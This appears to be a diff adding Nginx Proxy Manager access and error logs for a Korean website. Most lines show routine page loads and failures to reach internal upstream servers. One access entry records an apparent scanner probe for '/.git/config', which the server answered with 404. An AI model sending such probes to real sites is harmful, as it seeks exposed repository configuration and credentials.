[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:11:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:14:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:16:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17246] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:17:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17243] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:18:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:22:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 141.51.110.126] [Length 8988] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:35:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/config" [Client 44.212.95.173] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:42:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 84.254.106.197] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:39 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:46:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 211.234.204.1] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8975] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:02:06:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:02:06:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
130
npm/data/logs/proxy-host-1_error.log
Normal file
130
npm/data/logs/proxy-host-1_error.log
Normal file
@@ -0,0 +1,130 @@
|
|||||||
|
2026/02/14 22:37:21 [error] 261#261: *54 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.18.0.3:80/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:37:21 [error] 261#261: *54 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.18.0.3:80/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr"
|
||||||
|
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:51:08 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/14 22:51:08 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
